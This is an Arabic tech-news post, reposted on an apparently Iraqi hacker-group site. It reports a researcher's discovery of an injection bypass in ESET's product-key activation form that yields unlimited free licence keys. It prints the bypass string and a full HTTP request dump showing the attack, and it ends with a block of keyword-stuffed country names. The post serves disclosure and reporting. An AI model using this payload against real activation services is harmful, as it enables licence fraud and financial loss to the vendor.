الحشد الشعبي

Recent Products RSS Feeds

جارٍ التحميل...

فريق الهكر العراقي KAMINDOZ

جارٍ التحميل...

TOOLS & EXPLOIT KAMINDOZ

جارٍ التحميل...

DOWNLOAD VIDEO
 

اخر التغريدات
مقاطع الفيديو

الباحث الأمني محمد عبد الباسط يكتشف ثغرة خطيرة بموقع Eset Antivirus كادت أن تسبب للشركة خسائر فادحة #الاخبار_التقنية #technology #اخبار_الهكر

3:51 م   Robots  

KAMINDOZ

↑ Grab this Headline Animator

وكالعادة الباحث الأمني المصري محمد عبد الباسط النوبي يحرج شركات مضادات الفيروسات وهذه المرة كانت من حظ شركة Eset Antivirus.
حيث قام الباحث الأمني باكتشاف ثغرة خطيرة كادت أن تخسر الشركة خسائر مادية فادحة، هذه الثغرة تتمثل في الحصول على عدد لا نهائي من الـ Keys الخاصة بتفعيل البرنامج، مما يترتب عليه حصولك على برنامج مدفوع ومرخص لمدة سنة.

download-2 (1)

تكمن خطورة هذه الثغرة في استغلالها، حيث أن في حالة استغلال هذه الثغرة، أو بيعها في الـ Black Market، كان ذلك سيؤثر على الشركة بشكل سلبي، وكان سيكبدها خسائر مالية فادحة، بالإضافة إلى الضرر المعنوي الذي سيلحق بسمعة بالشركة.

الباحث الأمني قام باكتشاف الثغرة في أحد الـ Inputs الخاصة بعملية ملئ استمارة التسجيل وذلك للحصول على نسختك المدفوعة من البرنامج، وتحديدا الـ Input المصاب هو الـ Input الخاص بالـ Product Key


وكانت تفاصيل الثغرة كالآتي:ـ


[*] Vulnerability Type : A2 – Broken Authentication and Session Management
[*] URL / Service: http://ift.tt/1POeOss
[*] Vulnerable Parameter(s) / Input(s): “serial” (Product Key field)
[*] Payload / Bypass string: ‘ OR ”’
[*] Request full dump:
POST /me/activate/reg/ HTTP/1.1
Host: eu-eset.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ift.tt/1da18w8
Cookie: [*]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25242107630722
Content-Length: 885

-----------------------------25242107630722
Content-Disposition: form-data; name="serial"
' OR '''
-----------------------------25242107630722
Content-Disposition: form-data; name="country"
20
-----------------------------25242107630722
Content-Disposition: form-data; name="firstname"
Mohamed
-----------------------------25242107630722
Content-Disposition: form-data; name="lastname"
Abdelbaset
-----------------------------25242107630722
Content-Disposition: form-data; name="company"
Seekurity
-----------------------------25242107630722
Content-Disposition: form-data; name="email"
SymbianSyMoh@Outlook.com
-----------------------------25242107630722
Content-Disposition: form-data; name="phone"
12345678911
-----------------------------25242107630722
Content-Disposition: form-data; name="note"
-----------------------------25242107630722--

وكما ترون بالـ Request، الـ Input المصاب هو الـ Input الخاص بالـ Product Key والذي قام الباحث الأمني بتمرير هذا الـ string له (‘ OR ”’) مما يترتب عليه عمل Bypass وبالتالي تقوم الشركة بإرسال بيانات التفعيل الخاصة بك على الإيميل بشكل فوري.


والفيديو التالي يوضح الـ PoC الخاصة بالثغرة:ـ

التدوينة الباحث الأمني محمد عبد الباسط يكتشف ثغرة خطيرة بموقع Eset Antivirus كادت أن تسبب للشركة خسائر فادحة ظهرت أولاً على iSecNews.



tehnology http://ift.tt/1e8GUD7
منتديات الهكر العراقي , منظمة الاختراق العراقية kamindoz
Share
روابط هذه التدوينة قابلة للنسخ واللصق
URL
HTML
BBCode

kamindoz


Posted in: ,

 
::جميع المشاركات المكتوبة تعبّر عن وجهة نظر كاتبها ... ولا تعبّر عن وجهة نظر إدارة الموقع::

C0DED BY IRAQ Electronic Army 2015-2016

iraq , syria , iran ,Afghanistan,Albania , Algeria , Andorra , Angola , Antigua , and , Barbuda , Argentina , Armenia , Aruba , Australia , Austria , Azerbaijan

Bahamas, , The , Bahrain , Bangladesh , Barbados , Belarus , Belgium , Belize , Benin , Bhutan , Bolivia , Bosnia , and , Herzegovina , Botswana , Brazil ,Brunei , Bulgaria , Burkina , Faso , Burma , BurundiCambodia , Cameroon , Canada , Cape , Verde , Central , African , Republic , Chad , Chile , China , Colombia , Comoros , Congo, , Democratic , Republic , of , the , Congo, , Republic , of , the , Costa , Rica , Cote , d'Ivoire , Croatia , Cuba , Curacao ,,,Cyprus , Czech , Republic.Denmark , Djibouti , Dominica , Dominican Republic

Ecuador , Egypt , El , Salvador , Equatorial , Guinea , Eritrea , Estonia , Ethiopia , Fiji Finland France , Gabon , Gambia, , The , Georgia , Germany , Ghana , Greece , Grenada , Guatemala , Guinea , Guinea-Bissau , Guyana , Haiti , Holy , See , Honduras , Hong , Kong , Hungary ,

Iceland,India, Indonesia Ireland Italy